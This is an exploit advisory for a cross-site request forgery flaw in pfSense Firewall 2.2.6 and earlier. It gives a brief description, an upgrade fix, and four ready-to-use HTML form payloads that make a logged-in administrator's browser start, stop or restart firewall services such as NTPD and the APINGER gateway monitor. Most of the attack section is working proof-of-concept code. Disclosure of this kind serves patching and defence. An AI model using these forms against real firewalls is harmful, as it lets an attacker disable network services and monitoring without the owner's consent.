# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery # Exploit Author: Aatif Shahdad# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz# Version: 2.2.6 and below.# Contact: https://twitter.com/61617469665f736# Category: webapps1. Description
An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall.2. Proof of Concept
Login to the Web Console,for example, http://192.168.0.1(set at the time of install) andopen the following POC’s:
Start NTPD service:<html><body><form action="https://192.168.0.1/status_services.php"><inputtype="hidden" name="mode" value="startservice"/><inputtype="hidden" name="service" value="ntpd"/><inputtype="submit" value="Submit request"/></form></body></html>
Stop NTPD service:<html><body><form action="https://192.168.0.1/status_services.php"><inputtype="hidden" name="mode" value="stopservice"/><inputtype="hidden" name="service" value="ntpd"/><inputtype="submit" value="Submit request"/></form></body></html>
Restart NTPD service:
POC:<html><body><form action="https://192.168.0.1/status_services.php"><inputtype="hidden" name="mode" value="restartservice"/><inputtype="hidden" name="service" value="ntpd"/><inputtype="submit" value="Submit request"/></form></body></html>
The service will automatically start/stop.
Note: That NTPD service can be replaced withany service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following POC:<html><body><form action="https://192.168.0.1/status_services.php"><inputtype="hidden" name="mode" value="stopservice"/><inputtype="hidden" name="service" value="apinger"/><inputtype="submit" value="Submit request"/></form></body></html>3. Solution:
Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads
